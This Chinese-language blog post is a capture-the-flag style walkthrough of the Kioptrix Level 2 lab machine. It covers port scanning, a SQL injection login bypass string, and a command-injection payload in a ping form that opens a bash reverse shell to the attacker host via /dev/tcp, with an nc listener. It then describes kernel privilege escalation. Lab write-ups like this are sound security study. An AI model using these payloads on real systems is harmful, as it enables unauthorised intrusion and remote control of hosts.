知者何南 发表于 2025-2-19 15:50:16

Kioptrix-Level Two

确定攻击靶机


[*]老样子先确定攻击靶机,多了个数据库服务

[*]攻击机:192.168.38.128
[*]靶机:192.168.38.131
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155004002-15991713.jpg

信息搜集

web服务80/443

页面信息


[*]为一个登录页面,尝试利用SQL注入1'or'1'='1就进去了存在Sql注入。不过页面貌前没发现什么东西。
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155002162-1702861581.jpg
[*]目录扫描到一个路径访问似乎是一个文档
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155004811-1072273009.jpg
[*]文档路径,不同语言内容类似,就是语言不一样
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155004810-1754873791.jpg
[*]获取网站指纹信息
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155004373-181147280.jpg
[*]nmap获取服务版本信息获取。
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155004557-502484680.jpg
数据库服务|3306


[*]尝试连接提示没有开启连接,几乎无解
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155002670-459832557.jpg
远程连接服务|22


[*]连接测试,提示无密钥交换方式需要后续去添加。
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155004263-1975161395.jpg
IPP(CUPS)|631


[*]可以通过web页面打开,不过没有任何东西就知道一个版本号码。属于网络打印服务
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155003916-1841890739.jpg
整理信息


[*]操作系统:Red Hat Linux
[*]内核版本:Linux 2.4.9
端口服务版本信息备注22/tcpsshOpenSSH 3.9p1 (protocol 1.99)交换方式需要添加80/tcphttpApache httpd 2.0.52 (CentOS) PHP4.3.9存在SQL注入111/tcprpcbind2 (RPC #100000)443/tcpssl/httpApache httpd 2.0.52 (CentOS) PHP4.3.9存在SQL注入631/tcpippCUPS 1.1打印服务3306/tcpmysqlMySQL (unauthorized)无法远程连接搜索攻击点

历史漏洞POC

SSH |3.9p1


[*]有一个命令实验但是缺少相关服务,只有用户枚举服务。
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155003311-849989431.jpg
Web| 80,443


[*]只有一个GET拒绝服务符合
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155005145-1113609578.jpg
CUPS|631


[*]除开第一个文件上传的,还有几个拒绝服务和本地提权可以利用
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155003905-1371213410.jpg
测试攻击

Web服务


[*]前段有个SQL注入归去看看吃了不细看的亏,没注意到他源代码错误的
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155001532-1957768898.jpg
[*]根据他表单提交的路径为pingit.php,传参为POST传参,传参点为submit表单按钮(必须),ip

[*]为什么必须要submit看HTML的类型为提交按钮,在前段需要按了提交按钮表单的内容才能被提交上去,全部是要必须带上的!!!,enctype为提交类型选择表单提交。
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155001532-1957768898.jpg

[*]可以ping那么就可能会存在REC远程代码实验
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155004555-1586838268.jpg
[*]大概确定了目标呆板上没有nc命令,只能通过bash将shell弹到攻击机上面
#传参,&要经过Url编码变成%26,多个参数之间用的不要进行编码,如果不行就修复表单提交
ip=127.0.0.1%26/bin/bash -i >%26 /dev/tcp/192.168.38.128/8888 0>&1&submit=submit
#监听本地端口
nc -lvvp 8888https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155004118-1512434787.jpg

[*]bash反弹到攻击机上面,先监听再EXECUTE
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155003869-436711969.jpg
正常表现表单方法


[*]刷新登录后的页面,利用Burp Suite抓取请求包,右键拦截响应包后forward
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155003835-1937274963.jpg
[*]将响应包的那个多的点删掉后关掉拦截就可以了
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155004886-854869354.jpg
提权


[*]可以看到当前的用户为apache用户,需要对当前用户权限进行提升,想了想之前看到的CUPS的提权漏洞可以试试
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155004071-1330037809.jpg
[*]不支持,缺少相关的情况架构(x86)不符合。
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155004664-134670299.jpg
信息搜集


[*]查看系统的版本和内核确定有没有相关的漏洞
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155003798-683192667.jpg
[*]查找相关版本漏洞
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155002940-1415663713.jpg
[*]查看版本和内核都符合要求
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155003988-1139525762.jpg
[*]传到靶机上面
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155003265-1908477604.jpg
[*]编译实验
https://img2024.cnblogs.com/blog/3422149/202502/3422149-20250219155002259-1406030310.jpg

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: Kioptrix-Level Two